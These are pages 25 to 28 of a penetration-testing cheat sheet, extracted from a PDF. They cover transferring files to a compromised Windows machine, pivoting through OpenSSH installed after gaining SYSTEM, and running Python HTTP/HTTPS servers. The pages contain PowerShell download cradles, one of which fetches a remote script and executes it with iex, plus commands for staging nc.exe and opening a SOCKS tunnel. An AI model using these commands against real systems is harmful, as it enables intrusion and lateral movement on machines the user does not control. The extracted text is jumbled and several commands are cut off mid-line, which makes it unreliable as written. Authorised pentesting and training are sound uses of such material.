  • 25. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 25 of 28 https://md2pdf.netlify.app/ xhost +targetip Linux Windows Transferring Files Without Metasploit Powershell Download files with powershell Creating a server with python3 python -m http.server Creating a server with python2 python -m SimpleHTTPServer 80 FTP You need to create a FTP server Server Linux Allow anonymous powershell -c "Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFil powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/I powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-n
  • 26. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 26 of 28 https://md2pdf.netlify.app/ python -m pyftpdlib -p 21 -u anonymous -P anonymous Windows Client ftp open target_ip port open 192.168.1.22 21 we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction. like this: C:UserskitsunesecDesktop>echo open 10.9.122.8>ftp_commands.txt C:UserskitsunesecDesktop>echo anonymous>>ftp_commands.txt C:UserskitsunesecDesktop>echo whatever>>ftp_commands.txt C:UserskitsunesecDesktop>ftp -s:ftp_commands.txt Apache Server server Put your files into /var/www/html cp nc.exe /var/www/html systemctl start apache2 client Get via web browser, wget or powershell... Windows Pivoting Openssh for Tunneling Once you got SYSTEM on the target machine. download: openssh_for_windows Then install it: powershell -command "Expand-Archive 'C:<path-to-zipped-openssh>openssh.zip' c:<pa
  • 27. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 27 of 28 https://md2pdf.netlify.app/ Now if you need, just adjust the firewall rules to your needs: Start the sshd service: net start sshd After these steps a regular ssh tunnel would sufice: From your linux machine: $ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip> done you have now a socks to tunnel through!! Resources HTTP/HTTPS Servers HTTPS using Python Create the Certificate: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes Start the HTTPS Server powershell -ExecutionPolicy Bypass -File c:<path-to-unzipped-openssh-folder>instal powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (ss import BaseHTTPServer, SimpleHTTPServer import ssl
  • 28. 20.02.2023 07:30 Pentest-Cheat-Sheets Page 28 of 28 https://md2pdf.netlify.app/ Wordlists Wordlists PacketStorm SecList cotse Default Password DefaultPassword RouterPassword Leak Pastebin Tables RainbowCrack Contribution HOW TO httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPReque httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=T httpd.serve_forever()